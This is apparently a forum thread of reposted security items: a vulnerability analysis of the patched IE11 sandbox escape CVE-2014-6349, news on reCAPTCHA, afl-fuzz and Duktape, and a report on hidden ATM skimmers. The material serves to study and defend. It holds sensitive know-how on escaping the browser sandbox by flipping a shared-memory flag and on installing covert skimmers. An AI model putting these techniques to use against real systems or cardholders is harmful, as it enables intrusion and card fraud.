I carried out my tests on a system running Windows 8.1 with Internet Explorer 11.0.9600.17107. After enabling IE 11's EPM mode, we run IE. The broker process and tab process are seen below: Figure 1. Internet Explorer broker and tab processes The parent iexplore.exe broker process's integrity is Medium. The iexplore.exe tab process's integrity is AppContainer. This means the web page rendering in the sandboxed tab process is in the sandbox and its privileges are controlled. Both processes share a memory section: \Sessions\1\BaseNamedObjects\ie_ias_<frame process id>-0000-0000-0000-000000000000. The section object's DACL (Discretionary Access Control List) status is below: Figure 2. Access Control List for shared memory The ACE (Access Control Entry) for SID S-1-15-3-4096 is encircled. This shows that this particular "user" can modify the shared memory. What is S-1-15-3-4096? It is a "capability" whose name is "internetExplorer". This particular concept was introduced in Windows 8 with AppContainer (please refer to the HITB presentation). Now, let us check the sandboxed tab process's security tokens: Figure 3. List of sandboxed tab process security tokens The above shows us that the sandboxed tabs can modify the memory of the shared memory section. Because of the shared memory section's role, the sandbox can be escaped. Before we look into why, we can examine the previous protections that were used by Internet Explorer. Figure 4. Architecture of Internet Explorer Internet Explorer 8 introduced the Loosely-Coupled Internet Explorer (LCIE) architecture to improve the browser's reliability. In IE11 EPM mode, the broker process runs with medium integrity and the tab processes run in AppContainer (i.e., each is sandboxed). The broker process manages the child tab processes, with each individual tab process rendering various open web pages.
In Figure 4, CBrowserFrame within the broker process receives and dispatches messages in the procedure CBrowserFrame::FrameMessagePump(). CTabWindow represents tab windows, with each CTabWindow instance corresponding to a sandboxed tab process. The CTabWindowManager manages existing CTabWindow instances, for example, creating a new instance or finding an existing instance. The shared memory contains the immutable application state (IAS), which is queried by the parent broker process and the sandboxed processes. The shared memory's address is held by a global variable whose full name is g_pvImmutableApplicationStateMappingBaseAddress. For convenience, we will refer to this shared memory as the shared IAS memory. This memory is created when the broker process starts. Below is the call stack: Figure 5. Call stack After CreateFileMapping is called, the access control information for this section object will be set. Figure 6. Setting the access control information The vulnerability exists in the circled code. The SetWindowsHandleAccess function's parameter is not set correctly, which causes the shared memory section object's ACE for the internetExplorer capability to grant the modify permission. Why can the attacker escape from the IE sandbox by modifying the shared IAS memory? Let us examine the contents of this memory space. It is 0x25C bytes in size, and the table below lists its contents. Table 1. Contents of shared memory space We can guess that if an attacker can modify the relevant byte(s) from a sandboxed process, he will control the parent broker process's behavior. For example, let us try the offset 0x2C. Its value is normally 1. We set it to zero from a sandboxed tab process. Normally, when a new tab is created, this is what is seen. A new process is created for the new tab. Figure 7. Normal setup – separate processes per tab If the boolean value at 0x2C is set to zero, a process for a new tab window is not created, as seen below: Figure 8.
No separate processes per tab The two tabs share a single process. Checking the new tab's properties, we find: Figure 9. Protected Mode turned off The page is not in sandbox mode (EPM mode). We know that 0x2C is a flag that determines whether a new process is created for a new tab, but how does this lead to a sandbox escape? When the user clicks the "New Tab" button in the IE UI, the broker process's CBrowserFrame::FrameMessagePump() function will get the message, and will dispatch the corresponding window's procedure to handle the message. Finally, it will call CTabWindowManager to create a CTabWindow instance, and will then query the shared IAS memory at 0x2C to decide whether to create a new process for the tab window or create a new thread instead. If this value is 1, a new process is created. If it is 0, the broker process only creates a new thread for the new tab. However, in this case, the new tab renders in the parent broker process's instance. We can see that the behavior of the parent broker process was modified by the sandboxed process – hence, the sandbox has been breached using this method. Any breach of a sandbox is dangerous and may be exploited in more dangerous attacks. This vulnerability was fixed by Microsoft by correcting the ACE of the internetExplorer capability for the shared IAS memory. Figure 10. Corrected ACE This can be seen in the code below. Figure 11. Modified code Sursa: Escaping the Internet Explorer Sandbox - Analyzing CVE-2014-6349 | Security Intelligence Blog | Trend Micro
-
Toorcon 16 - Reverse Engineering Malware For Newbies Description: http://gironsec.com/code/Re_For_Nubs.tgz For More Information please visit: - ToorCon | Information Security Conferences Via: Toorcon 16 - Reverse Engineering Malware For Newbies
-
Duktape

Duktape is an embeddable Javascript engine, with a focus on portability and compact footprint. Duktape is easy to integrate into a C/C++ project: add duktape.c and duktape.h to your build, and use the Duktape API to call Ecmascript functions from C code and vice versa.

Main features:

Embeddable, portable, compact; about 210kB code, 80kB memory, 40kLoC source (excluding comments etc.)
Ecmascript E5/E5.1 compliant, some features borrowed from E6 draft
Built-in regular expression engine
Built-in Unicode support
Minimal platform dependencies
Combined reference counting and mark-and-sweep garbage collection with finalization
Custom features like coroutines, built-in logging framework, and built-in CommonJS-based module loading framework
Property virtualization using a subset of Ecmascript E6 Proxy object
Liberal license (MIT)

Current status: Stable

Support:
User community Q&A: Stack Overflow duktape tag
Bugs and feature requests: GitHub issues
General discussion: IRC #duktape on chat.freenode.net (webchat)

Sursa: Duktape
-
Folks, stop making your email addresses public...
-
[h=1]american fuzzy lop (0.85b)[/h] American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful for seeding other, more labor- or resource-intensive testing regimes down the road. Compared to other instrumented fuzzers, afl-fuzz is designed to be practical: it has modest performance overhead, uses a variety of highly effective fuzzing strategies, requires essentially no configuration, and seamlessly handles complex, real-world use cases - say, common image parsing or file compression libraries. [h=2]The "sales pitch"[/h] In a hurry? There are several fairly decent reasons to give afl-fuzz a try: It is pretty sophisticated. It's an instrumentation-guided genetic fuzzer capable of synthesizing complex file semantics in a wide range of non-trivial targets, lessening the need for purpose-built, syntax-aware tools. It also comes with a unique crash explorer to make it dead simple to evaluate the impact of crashing bugs. It has street smarts. It is built around a range of carefully researched, high-gain test case preprocessing and fuzzing strategies rarely employed with comparable rigor in other fuzzing frameworks. As a result, it finds real bugs. It is fast. Thanks to its low-level compile-time instrumentation and other optimizations, the tool offers near-native fuzzing speeds against common real-world targets. For example, you can get 2,500+ execs per second per core with libpng. It's rock solid. Compared to other instrumentation- or solver-based fuzzers, it has remarkably few failure modes. It also comes with robust, user-friendly problem detection that guides you through any potential hiccups. No tinkering required. 
In contrast to most other fuzzers, the tool requires essentially no guesswork or fine-tuning. Even if you wanted to, you will find virtually no knobs to fiddle with and no "fuzzing ratios" to dial in. It's chainable to other tools. The fuzzer generates superior, compact test corpora that can serve as a seed for more specialized, slower, or labor-intensive processes and testing frameworks. It sports a hip, retro-style UI. Just scroll back to the top of the page. Enough said. Want to try it out? Check out the documentation or grab the source code right away. [h=2]The bug-o-rama trophy case[/h] The fuzzer is still under active development, and I have not been running it very systematically or at a scale. Still, based on user reports, it seems to have netted quite a few notable vulnerabilities and other uniquely interesting bugs. Some of the "trophies" that I am aware of include: IJG jpeg, libjpeg-turbo, Mozilla Firefox, Google Chrome, Internet Explorer, bash (post-Shellshock), GnuTLS, GnuPG, OpenSSH, FLAC audio library, tcpdump, dpkg, systemd-resolved, strings (+ related tools), less / lesspipe, rcs, OpenBSD pfctl, man & mandoc, libyaml, Info-Zip unzip, procmail, libsndfile, fwknop, and mutt. Plus, probably, quite a few other things that weren't attributed to the tool and that I have no way of knowing about.
[h=2]Download & other useful links[/h] Here's a collection of useful links related to afl-fuzz: Current and past releases of the tool (changes), Online copy of the README file, Description of the status screen, Generated test cases for common image formats, Notes on the inspiration and design goals for afl-fuzz. The tool is confirmed to work on x86 Linux, OpenBSD, FreeBSD, and NetBSD, both 32- and 64-bit. It should also work on MacOS X and Solaris, although with some constraints. It supports programs written in C, C++, or Objective C, compiled with either gcc or clang. Java programs compiled with GCJ can be supported with very little effort. If you are honestly interested, ping me and I'll help you set it up. For fuzzing Python, you may want to check out this module from Jakub Wilk. To send bug reports, feature requests, or chocolate, simply drop a mail to lcamtuf@coredump.cx. Sursa: american fuzzy lop
-
[h=1]Google Reinvents the CAPTCHA[/h] [h=4]Tara Seals US/North America News Reporter, Infosecurity Magazine[/h] Email Tara We’re all familiar with reCAPTCHAs: those scrambled letter ciphers that users are asked to key in, in order to protect websites from spam and abuse by robots. For years, web surfers have been asked to read distorted text and type it into a box—leading to a safer web, but a more frustrated user populace. Sometimes, not even live humans can get the CAPTCHAs right. Google aims to change all of that—by reinventing the CAPTCHA experience. “We figured it would be easier to just directly ask our users whether or not they are robots—so, we did!” said Vinay Shet, Google’s product manager for reCAPTCHA, in a blog. “We’ve begun rolling out a new API that radically simplifies the reCAPTCHA experience. We’re calling it the ‘No CAPTCHA reCAPTCHA.’” Now, users are asked to simply check a box that asks, “Are you sure you’re not a robot?” From there, in some cases, a CAPTCHA to solve will be presented. But not always. While the user experience will be better, there’s another reason for the change: Today’s artificial intelligence technology can solve even the most difficult variant of distorted text, at 99.8% accuracy. “Thus distorted text, on its own, is no longer a dependable test,” Shet said. To counter this, Google has developed an advanced risk analysis back-end for reCAPTCHA that actively considers a user’s entire engagement with the CAPTCHA—before, during, and after—to determine whether that user is a human. “This enables us to rely less on typing distorted text and, in turn, offer a better experience for users,” Shet said. 
And, “while the new reCAPTCHA API may sound simple, there is a high degree of sophistication behind that modest checkbox.” In cases when the risk analysis engine can't confidently predict whether a user is a human or an abusive agent, it will prompt a CAPTCHA to elicit more cues, increasing the number of security checkpoints to confirm the user is valid. Google has also worked on the mobile aspect of CAPTCHAs—after all, typing in a code on a smaller screen offers plenty of room for mis-typing and customer dissatisfaction. So, in one example, a website visitor may be asked to tap, say, all of the pictures of turkeys within a screen of animal tiles. “This new API…lets us experiment with new types of challenges that are easier for us humans to use, particularly on mobile devices,” Shet said. Websites are already adopting these methods, including early adopters like Snapchat, WordPress, Humble Bundle and others. “For example, in the last week, more than 60% of WordPress’ traffic and more than 80% of Humble Bundle’s traffic on reCAPTCHA encountered the No CAPTCHA experience—users got to these sites faster,” Shet said. “Humans, we'll continue our work to keep the Internet safe and easy to use. Abusive bots and scripts, it’ll only get worse—sorry we’re (still) not sorry.” Sursa: Google Reinvents the CAPTCHA - Infosecurity Magazine
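For site owners, the server side of the new API works the same way as before: the page embeds the reCAPTCHA widget, and the backend confirms the returned token against Google's documented siteverify endpoint. A minimal, hedged Python sketch (the secret key and token values below are placeholders, not real credentials):

```python
import json
import urllib.parse
import urllib.request

# Documented reCAPTCHA server-side verification endpoint.
VERIFY_URL = "https://www.google.com/recaptcha/api/siteverify"

def build_verify_request(secret, response_token, remote_ip=None):
    """Build the POST request the siteverify API expects."""
    params = {"secret": secret, "response": response_token}
    if remote_ip:
        params["remoteip"] = remote_ip  # optional, documented parameter
    data = urllib.parse.urlencode(params).encode()
    return urllib.request.Request(VERIFY_URL, data=data)

def is_human(secret, response_token, remote_ip=None):
    """POST the widget's token to Google and return the 'success' flag."""
    req = build_verify_request(secret, response_token, remote_ip)
    with urllib.request.urlopen(req) as resp:
        return json.load(resp).get("success", False)
```

The JSON reply carries a "success" boolean; a production handler would also inspect the returned "error-codes" field and put a timeout on the request.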
-
[h=1]Thieves keep up with technology too: this is what the new "invisible" skimmers used to clone credit cards look like[/h] Aurelian Mihai - 3 Dec 2014 The devices attached to ATMs for the purpose of cloning credit cards have reached an impressive level of miniaturization, becoming practically invisible to untrained eyes. With no components in plain sight, the new ATM skimmers pose a real risk to ATMs placed in public spaces. Ingeniously disguised to attract as little attention as possible while attached to the ATM, the skimmer devices used by criminals to clone bank cards are constantly evolving. Recently discovered on an ATM in Europe, a new type of ATM skimmer built using the "wiretapping" method seems to have found the perfect camouflage: the device is installed practically inside the ATM, operating without raising any suspicion. Skimmer built using the "wiretapping" method The installation procedure involves making a hole in the ATM's casing, right next to the card slot. The criminals then connect a miniature recording device directly to the ATM's card reader, using custom tools and equipment. To avoid raising suspicion, the hole is disguised with a sticker imitating the ATM's usage instructions. The skimmer installed inside the ATM records card data autonomously. To collect the harvested data, the thieves only need to peel off the sticker and connect the exposed wire to an external storage device. Until the authorities are alerted, the data collection procedure can be repeated as many times as needed. Skimmer designed to be slipped directly into the card acceptance slot Another innovation in the field of ATM skimmers is a device shaped like a steel plate, containing all the necessary electronic components and a battery sufficient for up to 2 weeks of activity. Designed to be slipped directly into the card acceptance slot, it too is completely invisible to the machine's users. The difference is that instead of a cable, the collected data is sent over a wireless connection to a smartphone in the pocket of the criminal, who stands in front of the ATM posing as a regular visitor. For the data collected from the credit cards to be usable, the PIN code must also be intercepted, using a miniature video camera disguised in a panel attached near the keypad. Sursa: Și hoții țin pasul cu tehnologia: așa arată noile Skimmere "invizibile" folosite la clonarea cardurilor de credit